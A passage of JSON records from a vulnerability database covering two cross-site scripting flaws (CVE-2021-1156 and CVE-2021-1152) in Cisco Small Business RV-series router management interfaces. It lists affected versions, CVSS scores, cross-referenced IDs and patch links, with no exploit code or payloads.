      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0798",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "cve": "CVE-2021-1156",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-1156",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2021-41158",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "VHN-374210",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2021-1156",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-1156",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1156",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1156",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1156",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41158",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1051",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374210",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374210"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374210"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1156",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0141",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374210",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374210"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "id": "VAR-202101-0798",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374210"
          }
        ],
        "trust": 1.3006743266666665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:34:59.677000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-stored-xss-LPTQ3EQC",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41158)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272226"
          },
          {
            "title": "Cisco Small Business Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139153"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374210"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1156"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374210"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374210"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374210"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          },
          {
            "date": "2021-01-13T22:15:15.630000",
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41158"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374210"
          },
          {
            "date": "2021-09-29T05:04:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          },
          {
            "date": "2021-01-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          },
          {
            "date": "2024-11-21T05:43:42.727000",
            "db": "NVD",
            "id": "CVE-2021-1156"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002664"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1051"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0794

    Vulnerability from variot - Updated: 2024-11-23 21:34

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0794",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "cve": "CVE-2021-1152",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-1152",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2021-41162",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "VHN-374206",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2021-1152",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-1152",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1152",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1152",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1152",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41162",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1026",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374206",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374206"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1152",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0141",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1026",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374206",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "CNNVD",
